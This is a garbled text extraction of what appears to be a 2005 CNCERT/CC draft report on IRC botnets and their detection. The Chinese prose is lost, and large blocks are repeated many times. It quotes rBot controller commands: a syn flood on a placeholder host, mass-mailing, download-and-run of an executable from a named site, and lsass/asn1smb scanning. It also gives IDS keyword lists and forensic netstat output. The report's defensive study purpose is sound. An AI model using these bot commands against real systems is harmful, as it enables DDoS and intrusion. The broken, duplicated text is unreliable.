CNCERTCC

CNCERTCC CNCERTCC_TR_2005-001(Draft)

Worm DDos Spam

Phishing Spyware

Botnet

[1]

Bot

DDos

DDos

Bot plusmnRobo

Bot

Zombie Zombie Bot Bot

Zombie Bot Bot

Zombie

IRC Bot IRC Bot IRC Bot

Channel

IRC Bot

Bot IRC Bot Bot

CommandampControl Server IRC Bot IRC amp

CampC S

BotNet Bot CampC S

IRC 1

Bot

IRC

1 IRC

IRC

Bot

Bot

IRC

AOL Bot IRC Bot AOL AIM-Canbot

Fizzer AOL Instant Messager Bot

P2P Bot Bot

phatbot P2P

Bot 90 Unix Bot 1993

Eggdrop Bot Bot IRC

Bot Bot Bot

Bot Bot IRC Bot Bot Bot 036hotmailcom

MSN Bot

1999

11 SubSeven 21 IRC

IRC Bot IRC Bot

Bot IRC Bot Bot

Windows Spam DDos Bot

Bot (Worm) Bot

Bot 2003 Deloader Bot

Bot Bot

Bot

Bot

Trojan Horse Bot

IP Bot

IRC DCC

Bot

Spyware

2

Bot

trojan horse

worm

Spyware

virus

2

1

2001

[16]

Botnet

2004 3 19

Witty Witty 10

110 20 50

2

DDoS DDoS

DDoS

DDoS

DDoS DDoS

3

IP CERT MessageLab [9][10] DDoS

4

5

6

socks

IRC IRC Bot

1 IRC Internet Relay Chat

IRC RFC1459 IRC Channel

IRC

IRC IRC IRC

irc263net IP IP IRC Server

A IP1 B IP2 A B

IRC Server irc263net

IRC

IRC TCP 6667 6000 7000

IRC Bot 443 8000 500

IRC

2 IRC Bot

IRC Bot IRC IRC

HIRC mIRC 1 IRC Bot IRC

2 IRC Bot

IRC Bot IRC GT bot

IRC mIRC mIRC

mIRC mIRC GT bot

mIRC

IRC Bot IRC IRC Bot

IRC

1 NICK USER Bot IRC

2 PASS IRC PASS TCP

3 JOIN Channel key key

3) MODE IRC Bot

4) PING PONG IRC IRC

PING PONG PING

IRC IRC Bot

PINGPONG IRC Bot

5) PRIVMSG Channel msg Bot

6) DCC SEND Bot

3

(Bot) IRC

P2P

IRC DCC 1987

2004 CNCERTCC

1

DDos

-gtPRIVMSG rbot syn wwwxxxcom

80 200 3600n

rbot syn syn flood 200

wwwxxxcom 80 syn 3600 -gt bot CampC S

lt-

2

(Phishing)

DNS

host pharming

ISP

redirector

[6]

Zombie Zombie Bot Bot

Zombie Bot Bot

Zombie

IRC Bot IRC Bot IRC Bot

Channel

IRC Bot

Bot IRC Bot Bot

CommandampControl Server IRC Bot IRC amp

CampC S

BotNet Bot CampC S

IRC 1

Bot

IRC

1 IRC

IRC

Bot

Bot

IRC

AOL Bot IRC Bot AOL AIM-Canbot

Fizzer AOL Instant Messager Bot

P2P Bot Bot

phatbot P2P

Bot 90 Unix Bot 1993

Eggdrop Bot Bot IRC

Bot Bot Bot

Bot Bot IRC Bot Bot Bot 036hotmailcom

MSN Bot

1999

11 SubSeven 21 IRC

IRC Bot IRC Bot

Bot IRC Bot Bot

Windows Spam DDos Bot

Bot (Worm) Bot

Bot 2003 Deloader Bot

Bot Bot

Bot

Bot

Trojan Horse Bot

IP Bot

IRC DCC

Bot

Spyware

2

Bot

trojan horse

worm

Spyware

virus

2

1

2001

[16]

Botnet

2004 3 19

Witty Witty 10

110 20 50

2

DDoS DDoS

DDoS

DDoS

DDoS DDoS

3

IP CERT MessageLab [9][10] DDoS

4

5

6

socks

IRC IRC Bot

1 IRC Internet Relay Chat

IRC RFC1459 IRC Channel

IRC

IRC IRC IRC

irc263net IP IP IRC Server

A IP1 B IP2 A B

IRC Server irc263net

IRC

IRC TCP 6667 6000 7000

IRC Bot 443 8000 500

IRC

2 IRC Bot

IRC Bot IRC IRC

HIRC mIRC 1 IRC Bot IRC

2 IRC Bot

IRC Bot IRC GT bot

IRC mIRC mIRC

mIRC mIRC GT bot

mIRC

IRC Bot IRC IRC Bot

IRC

1 NICK USER Bot IRC

2 PASS IRC PASS TCP

3 JOIN Channel key key

3) MODE IRC Bot

4) PING PONG IRC IRC

PING PONG PING

IRC IRC Bot

PINGPONG IRC Bot

5) PRIVMSG Channel msg Bot

6) DCC SEND Bot

3

(Bot) IRC

P2P

IRC DCC 1987

2004 CNCERTCC

1

DDos

-gtPRIVMSG rbot syn wwwxxxcom

80 200 3600n

rbot syn syn flood 200

wwwxxxcom 80 syn 3600 -gt bot CampC S

lt-

2

(Phishing)

DNS

host pharming

ISP

redirector

[6]

Bot

Bot

IRC

AOL Bot IRC Bot AOL AIM-Canbot

Fizzer AOL Instant Messager Bot

P2P Bot Bot

phatbot P2P

Bot 90 Unix Bot 1993

Eggdrop Bot Bot IRC

Bot Bot Bot

Bot Bot IRC Bot Bot Bot 036hotmailcom

MSN Bot

1999

11 SubSeven 21 IRC

IRC Bot IRC Bot

Bot IRC Bot Bot

Windows Spam DDos Bot

Bot (Worm) Bot

Bot 2003 Deloader Bot

Bot Bot

Bot

Bot

Trojan Horse Bot

IP Bot

IRC DCC

Bot

Spyware

2

Bot

trojan horse

worm

Spyware

virus

2

1

2001

[16]

Botnet

2004 3 19

Witty Witty 10

110 20 50

2

DDoS DDoS

DDoS

DDoS

DDoS DDoS

3

IP CERT MessageLab [9][10] DDoS

4

5

6

socks

IRC IRC Bot

1 IRC Internet Relay Chat

IRC RFC1459 IRC Channel

IRC

IRC IRC IRC

irc263net IP IP IRC Server

A IP1 B IP2 A B

IRC Server irc263net

IRC

IRC TCP 6667 6000 7000

IRC Bot 443 8000 500

IRC

2 IRC Bot

IRC Bot IRC IRC

HIRC mIRC 1 IRC Bot IRC

2 IRC Bot

IRC Bot IRC GT bot

IRC mIRC mIRC

mIRC mIRC GT bot

mIRC

IRC Bot IRC IRC Bot

IRC

1 NICK USER Bot IRC

2 PASS IRC PASS TCP

3 JOIN Channel key key

3) MODE IRC Bot

4) PING PONG IRC IRC

PING PONG PING

IRC IRC Bot

PINGPONG IRC Bot

5) PRIVMSG Channel msg Bot

6) DCC SEND Bot

3

(Bot) IRC

P2P

IRC DCC 1987

2004 CNCERTCC

1

DDos

-gtPRIVMSG rbot syn wwwxxxcom

80 200 3600n

rbot syn syn flood 200

wwwxxxcom 80 syn 3600 -gt bot CampC S

lt-

2

(Phishing)

DNS

host pharming

ISP

redirector

[6]

Bot (Worm) Bot

Bot 2003 Deloader Bot

Bot Bot

Bot

Bot

Trojan Horse Bot

IP Bot

IRC DCC

Bot

Spyware

2

Bot

trojan horse

worm

Spyware

virus

2

1

2001

[16]

Botnet

2004 3 19

Witty Witty 10

110 20 50

2

DDoS DDoS

DDoS

DDoS

DDoS DDoS

3

IP CERT MessageLab [9][10] DDoS

4

5

6

socks

IRC IRC Bot

1 IRC Internet Relay Chat

IRC RFC1459 IRC Channel

IRC

IRC IRC IRC

irc263net IP IP IRC Server

A IP1 B IP2 A B

IRC Server irc263net

IRC

IRC TCP 6667 6000 7000

IRC Bot 443 8000 500

IRC

2 IRC Bot

IRC Bot IRC IRC

HIRC mIRC 1 IRC Bot IRC

2 IRC Bot

IRC Bot IRC GT bot

IRC mIRC mIRC

mIRC mIRC GT bot

mIRC

IRC Bot IRC IRC Bot

IRC

1 NICK USER Bot IRC

2 PASS IRC PASS TCP

3 JOIN Channel key key

3) MODE IRC Bot

4) PING PONG IRC IRC

PING PONG PING

IRC IRC Bot

PINGPONG IRC Bot

5) PRIVMSG Channel msg Bot

6) DCC SEND Bot

3

(Bot) IRC

P2P

IRC DCC 1987

2004 CNCERTCC

1

DDos

-gtPRIVMSG rbot syn wwwxxxcom

80 200 3600n

rbot syn syn flood 200

wwwxxxcom 80 syn 3600 -gt bot CampC S

lt-

2

(Phishing)

DNS

host pharming

ISP

redirector

[6]

[16]

Botnet

2004 3 19

Witty Witty 10

110 20 50

2

DDoS DDoS

DDoS

DDoS

DDoS DDoS

3

IP CERT MessageLab [9][10] DDoS

4

5

6

socks

IRC IRC Bot

1 IRC Internet Relay Chat

IRC RFC1459 IRC Channel

IRC

IRC IRC IRC

irc263net IP IP IRC Server

A IP1 B IP2 A B

IRC Server irc263net

IRC

IRC TCP 6667 6000 7000

IRC Bot 443 8000 500

IRC

2 IRC Bot

IRC Bot IRC IRC

HIRC mIRC 1 IRC Bot IRC

2 IRC Bot

IRC Bot IRC GT bot

IRC mIRC mIRC

mIRC mIRC GT bot

mIRC

IRC Bot IRC IRC Bot

IRC

1 NICK USER Bot IRC

2 PASS IRC PASS TCP

3 JOIN Channel key key

3) MODE IRC Bot

4) PING PONG IRC IRC

PING PONG PING

IRC IRC Bot

PINGPONG IRC Bot

5) PRIVMSG Channel msg Bot

6) DCC SEND Bot

3

(Bot) IRC

P2P

IRC DCC 1987

2004 CNCERTCC

1

DDos

-gtPRIVMSG rbot syn wwwxxxcom

80 200 3600n

rbot syn syn flood 200

wwwxxxcom 80 syn 3600 -gt bot CampC S

lt-

2

(Phishing)

DNS

host pharming

ISP

redirector

[6]

IRC IRC Bot

1 IRC Internet Relay Chat

IRC RFC1459 IRC Channel

IRC

IRC IRC IRC

irc263net IP IP IRC Server

A IP1 B IP2 A B

IRC Server irc263net

IRC

IRC TCP 6667 6000 7000

IRC Bot 443 8000 500

IRC

2 IRC Bot

IRC Bot IRC IRC

HIRC mIRC 1 IRC Bot IRC

2 IRC Bot

IRC Bot IRC GT bot

IRC mIRC mIRC

mIRC mIRC GT bot

mIRC

IRC Bot IRC IRC Bot

IRC

1 NICK USER Bot IRC

2 PASS IRC PASS TCP

3 JOIN Channel key key

3) MODE IRC Bot

4) PING PONG IRC IRC

PING PONG PING

IRC IRC Bot

PINGPONG IRC Bot

5) PRIVMSG Channel msg Bot

6) DCC SEND Bot

3

(Bot) IRC

P2P

IRC DCC 1987

2004 CNCERTCC

1

DDos

-gtPRIVMSG rbot syn wwwxxxcom

80 200 3600n

rbot syn syn flood 200

wwwxxxcom 80 syn 3600 -gt bot CampC S

lt-

2

(Phishing)

DNS

host pharming

ISP

redirector

[6]

IRC Bot IRC GT bot

IRC mIRC mIRC

mIRC mIRC GT bot

mIRC

IRC Bot IRC IRC Bot

IRC

1 NICK USER Bot IRC

2 PASS IRC PASS TCP

3 JOIN Channel key key

3) MODE IRC Bot

4) PING PONG IRC IRC

PING PONG PING

IRC IRC Bot

PINGPONG IRC Bot

5) PRIVMSG Channel msg Bot

6) DCC SEND Bot

3

(Bot) IRC

P2P

IRC DCC 1987

2004 CNCERTCC

1

DDos

-gtPRIVMSG rbot syn wwwxxxcom

80 200 3600n

rbot syn syn flood 200

wwwxxxcom 80 syn 3600 -gt bot CampC S

lt-

2

(Phishing)

DNS

host pharming

ISP

redirector

[6]

IRC DCC 1987

2004 CNCERTCC

1

DDos

-gtPRIVMSG rbot syn wwwxxxcom

80 200 3600n

rbot syn syn flood 200

wwwxxxcom 80 syn 3600 -gt bot CampC S

lt-

2

(Phishing)

DNS

host pharming

ISP

redirector

[6]

Phi s h i ng

3 (Spam)

Spammer

blacklist

1

-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml

mm mass mail httpwww recptcom

fetchphp php

httpwwwmailnetemailhtml

ip spammer

2 socks v4v5 Open Relay

Spammer Open Proxy Open Mail Relay

Open Relay Server Open Mail Relay Spammer

Spammer Proxy Open Relay Proxy

Open Relay Spammer Proxy Open Relay

Spammer

socks v4 Smtp Open Relay

socks v4 Open Relay

IP ISP IP

3

email AgoBot

harvestemails

4 (Spyware)

Spyware Keylogger

-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1

httpwwwelitecodersnet updateexe crBotexe 1

Windows Bot

Bot bot

PINGPONG bot

IRC TCP 6667 CNCERTCC

bot bot

cmdexe plusmnnetst at an IP

IP

135 445

fportexe netstat

11

bot

CD-Key

bot

socks v4 Smtp Open Relay

socks v4 Open Relay

IP ISP IP

3

email AgoBot

harvestemails

4 (Spyware)

Spyware Keylogger

-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1

httpwwwelitecodersnet updateexe crBotexe 1

Windows Bot

Bot bot

PINGPONG bot

IRC TCP 6667 CNCERTCC

bot bot

cmdexe plusmnnetst at an IP

IP

135 445

fportexe netstat

11

bot

CD-Key

bot

bot ie

ie bot rootkit [2]

bot rootkit

rootkit bot

CNCERTCC

1 honeypot bot

2) IDS

3

IRC

1 Honeypot

bot bot Honeywall

bot dnsip

windows 25 [11]

bot bot

[3] honeynet project 2004 11

2005 3 1 HoneyWall 1 mwcollect[8]

180

30 5500 800 2004

11 2005 1 406 Ddos 179 [4]

2

IRC IDS IRC Bot JOIN PASS

PRIVMSG NICK TOPIC NOTICE

IRC TCP

udp syn ddos http download exe update scan exploit login

logon advscan lsass dcom beagle dameware

3

1 bot(fast joining bots)

bots IRC

IRC

2) bot(Long standing connection)

bots

3) bot(not talkative)

Bots bot pingpong

DdoSVax [5] Bot

4

1

IDS bot

bot bot

bot bot

IDS IRC

2

IDS IRC

Bot IRC IRC RFC IDS

bot

IRC IRC

3

IDS

bot

IDS

socks v4

Server plusmnTOPI rBot advscan lsass 200 5 0 -r s

a

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

b

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

c) Botnet bot

lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass

200 5 0 -r srn

IDS bot

IP IP IP IP

IDS 3 1 3

1 3 1

1 IDS

IRC

1

IP port ( )

2

channel ( )

3 Host

login pass

host bot

4 Bot

login update download uninstall

Botnet

1

bot

1

bot

bot

bot

2

bot

bot bot

bot

2

IP

bot

3 bot

2005 CNCERTCC

Bot

1 IRC

IRC bot

bot bot

IRC

Serv1 Serv2 shy Ser v N

IRC Serv1 Serv1 IP Serv2

Serv3 Serv2 Nick_Serv1

Serv2 Serv1 IRC ServX Nick_Serv3

Nick_Serv6 Serv3 Serv6 ServX

2 TOPIC

TOPIC IRC

bot TOPIC

TOPIC 1)advscan lsass 200 5 0 -r s

LSASS 200 5 -r = random

-s = silent

2)httpupdate httpserverrBotexe crBotexe 1

server rBotexe c 1

CNCERTCC TOPIC Bot

TOPIC degJ OI N ne wchanne

TOPIC PRIVMSG

bot bot bot TOPIC

IRC IDS IRC Bot JOIN PASS

PRIVMSG NICK TOPIC NOTICE

IRC TCP

udp syn ddos http download exe update scan exploit login

logon advscan lsass dcom beagle dameware

3

1 bot(fast joining bots)

bots IRC

IRC

2) bot(Long standing connection)

bots

3) bot(not talkative)

Bots bot pingpong

DdoSVax [5] Bot

4

1

IDS bot

bot bot

bot bot

IDS IRC

2

IDS IRC

Bot IRC IRC RFC IDS

bot

IRC IRC

3

IDS

bot

IDS

socks v4

Server plusmnTOPI rBot advscan lsass 200 5 0 -r s

a

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

b

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

c) Botnet bot

lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass

200 5 0 -r srn

IDS bot

IP IP IP IP

IDS 3 1 3

1 3 1

1 IDS

IRC

1

IP port ( )

2

channel ( )

3 Host

login pass

host bot

4 Bot

login update download uninstall

Botnet

1

bot

1

bot

bot

bot

2

bot

bot bot

bot

2

IP

bot

3 bot

2005 CNCERTCC

Bot

1 IRC

IRC bot

bot bot

IRC

Serv1 Serv2 shy Ser v N

IRC Serv1 Serv1 IP Serv2

Serv3 Serv2 Nick_Serv1

Serv2 Serv1 IRC ServX Nick_Serv3

Nick_Serv6 Serv3 Serv6 ServX

2 TOPIC

TOPIC IRC

bot TOPIC

TOPIC 1)advscan lsass 200 5 0 -r s

LSASS 200 5 -r = random

-s = silent

2)httpupdate httpserverrBotexe crBotexe 1

server rBotexe c 1

CNCERTCC TOPIC Bot

TOPIC degJ OI N ne wchanne

TOPIC PRIVMSG

bot bot bot TOPIC

IRC IRC

3

IDS

bot

IDS

socks v4

Server plusmnTOPI rBot advscan lsass 200 5 0 -r s

a

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

b

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

c) Botnet bot

lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass

200 5 0 -r srn

IDS bot

IP IP IP IP

IDS 3 1 3

1 3 1

1 IDS

IRC

1

IP port ( )

2

channel ( )

3 Host

login pass

host bot

4 Bot

login update download uninstall

Botnet

1

bot

1

bot

bot

bot

2

bot

bot bot

bot

2

IP

bot

3 bot

2005 CNCERTCC

Bot

1 IRC

IRC bot

bot bot

IRC

Serv1 Serv2 shy Ser v N

IRC Serv1 Serv1 IP Serv2

Serv3 Serv2 Nick_Serv1

Serv2 Serv1 IRC ServX Nick_Serv3

Nick_Serv6 Serv3 Serv6 ServX

2 TOPIC

TOPIC IRC

bot TOPIC

TOPIC 1)advscan lsass 200 5 0 -r s

LSASS 200 5 -r = random

-s = silent

2)httpupdate httpserverrBotexe crBotexe 1

server rBotexe c 1

CNCERTCC TOPIC Bot

TOPIC degJ OI N ne wchanne

TOPIC PRIVMSG

bot bot bot TOPIC

host bot

4 Bot

login update download uninstall

Botnet

1

bot

1

bot

bot

bot

2

bot

bot bot

bot

2

IP

bot

3 bot

2005 CNCERTCC

Bot

1 IRC

IRC bot

bot bot

IRC

Serv1 Serv2 shy Ser v N

IRC Serv1 Serv1 IP Serv2

Serv3 Serv2 Nick_Serv1

Serv2 Serv1 IRC ServX Nick_Serv3

Nick_Serv6 Serv3 Serv6 ServX

2 TOPIC

TOPIC IRC

bot TOPIC

TOPIC 1)advscan lsass 200 5 0 -r s

LSASS 200 5 -r = random

-s = silent

2)httpupdate httpserverrBotexe crBotexe 1

server rBotexe c 1

CNCERTCC TOPIC Bot

TOPIC degJ OI N ne wchanne

TOPIC PRIVMSG

bot bot bot TOPIC

3 bot

2005 CNCERTCC

Bot

1 IRC

IRC bot

bot bot

IRC

Serv1 Serv2 shy Ser v N

IRC Serv1 Serv1 IP Serv2

Serv3 Serv2 Nick_Serv1

Serv2 Serv1 IRC ServX Nick_Serv3

Nick_Serv6 Serv3 Serv6 ServX

2 TOPIC

TOPIC IRC

bot TOPIC

TOPIC 1)advscan lsass 200 5 0 -r s

LSASS 200 5 -r = random

-s = silent

2)httpupdate httpserverrBotexe crBotexe 1

server rBotexe c 1

CNCERTCC TOPIC Bot

TOPIC degJ OI N ne wchanne

TOPIC PRIVMSG

bot bot bot TOPIC

TOPIC IP IP

IP

3

bot

bot

Bot

login logon auth

bot bot nick

host rBot v065

1

-gtPRIVMSG rbot login password sn

IP

2 bot

lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn

1 2

IP Bot

host

IP

lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn

10101010 login

3 rBot NICK

ControllerNICK USER(ControllerUSER) host (login) (password

-s) rBot

user host rBot

host net com net

com rBot host com net

()

4 -s silent bot

-gtPRIVMSG rbot password acceptedn

bot

Windows Windows

bot 90

[7]

Windows XP

11

Bot

Symantec 2004 1 6 Bot

2000 30000 [15] MessageLabs 2004

70 [10] CipherTrust 2005 4 5

15 17 20-15

Bot [12]

IRC Agobot

PhatBot P2P

IRC P2P

2005 rootkit bot(rBot )

rootkit bot bot

2004

CNCERTCC Bot

IRC

P2P P2P bot

Phatbot[13] sinit[14]

Phatbot Gnutella Guutella cache servers server peer

peer TCP 4387 Gnutella Phatbot

waste waste Phatbot waste

md5

Phatbot

sinit P2P Peer

dll dll sinit

bot

CNCERTCC bot

httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe

IP 10001

sniffer

cmdexe

cgtnetstat anrn

()

4 -s silent bot

-gtPRIVMSG rbot password acceptedn

bot

Windows Windows

bot 90

[7]

Windows XP

11

Bot

Symantec 2004 1 6 Bot

2000 30000 [15] MessageLabs 2004

70 [10] CipherTrust 2005 4 5

15 17 20-15

Bot [12]

IRC Agobot

PhatBot P2P

IRC P2P

2005 rootkit bot(rBot )

rootkit bot bot

2004

CNCERTCC Bot

IRC

P2P P2P bot

Phatbot[13] sinit[14]

Phatbot Gnutella Guutella cache servers server peer

peer TCP 4387 Gnutella Phatbot

waste waste Phatbot waste

md5

Phatbot

sinit P2P Peer

dll dll sinit

bot

CNCERTCC bot

httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe

IP 10001

sniffer

cmdexe

cgtnetstat anrn

IRC Agobot

PhatBot P2P

IRC P2P

2005 rootkit bot(rBot )

rootkit bot bot

2004

CNCERTCC Bot

IRC

P2P P2P bot

Phatbot[13] sinit[14]

Phatbot Gnutella Guutella cache servers server peer

peer TCP 4387 Gnutella Phatbot

waste waste Phatbot waste

md5

Phatbot

sinit P2P Peer

dll dll sinit

bot

CNCERTCC bot

httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe

IP 10001

sniffer

cmdexe

cgtnetstat anrn

TCP 0000135 00000 LISTENING

TCP 0000445 00000 LISTENING

TCP 100011150 203151217856667 ESTABLISHED

TCP 100011616 20210832137445 FIN_WAIT_1

TCP 100011631 20210832147445 FIN_WAIT_1

TCP 100011714 20210832190445 FIN_WAIT_1

TCP 100011727 20210832165445 FIN_WAIT_1

TCP 100012253 20210834211445 TIME_WAIT

TCP 100012904 2021083791445 TIME_WAIT

TCP 100013476 20210839151445 TIME_WAIT

TCP 100013478 20210839153445 TIME_WAIT

TCP 100013480 20210839155445 TIME_WAIT

TCP 100013486 20210839151445 TIME_WAIT

TCP 100013487 20210839153445 TIME_WAIT

TCP 100013488 20210839155445 TIME_WAIT

TCP 100013673 2021084082445 TIME_WAIT

TCP 100013674 2021084082445 TIME_WAIT

TCP 100014953 2021084520445 TIME_WAIT

TCP 100014955 2021084520445 TIME_WAIT

TCP 100014959 2021084523445 TIME_WAIT

TCP 100014961 2021084523445 TIME_WAIT

UDP 000069 UDP 69

UDP 0000445

UDP 10001137

UDP 10001138

fportexe

C gtfport | find 1150 1150 6667

1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe

Cgtfport | find 69

1048 wininit -gt 69 UDP CWINNTsystem32wininitexe

6667 69 wininitexe rBot

wininitexe sysinternals FileMon

bot sysinternals autoruns

rBot

HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe

HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe

Wininit 445 6667

IP

20315121785 6667

TCP

Wininit IRC

-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )

-gtJOIN xdcc dropitrn ( xdcc dropit)

lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (

advscan asn1smb )

-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0

min using 100 threadsrn( )

CNCERTCC 2005

[1]

20054

[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005

httpwwweweekcomarticle201759181697200asp

[3] honeynet project plusmn Kno w your ene my

Tracking Botnet

[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks

Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual

[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann

wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf

[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005

[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier

Microsoft Research ACM SIGCOMM 2004

[8] httpwwwmwcollectorg

[9] httpwwwcertorg

[10] httpwwwmessagelabcouk

[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o

wwwsdissaorgdownloadsemergingthreats-publicpdf

[12] httpwwwciphertrustcomresourcesstatisticszombiephp

Wininit IRC

-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )

-gtJOIN xdcc dropitrn ( xdcc dropit)

lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (

advscan asn1smb )

-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0

min using 100 threadsrn( )

CNCERTCC 2005

[1]

20054

[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005

httpwwweweekcomarticle201759181697200asp

[3] honeynet project plusmn Kno w your ene my

Tracking Botnet

[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks

Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual

[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann

wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf

[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005

[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier

Microsoft Research ACM SIGCOMM 2004

[8] httpwwwmwcollectorg

[9] httpwwwcertorg

[10] httpwwwmessagelabcouk

[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o

wwwsdissaorgdownloadsemergingthreats-publicpdf

[12] httpwwwciphertrustcomresourcesstatisticszombiephp

[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml

[14] Lurhq Threat Intelligence Group

Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml

[15] httpwwwsymanteccompressindex_2004html

[16] Tom Vogt Simulating and optimising worm propagation algorithms

wwwsecurityfocuscomguest24046 20039

This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only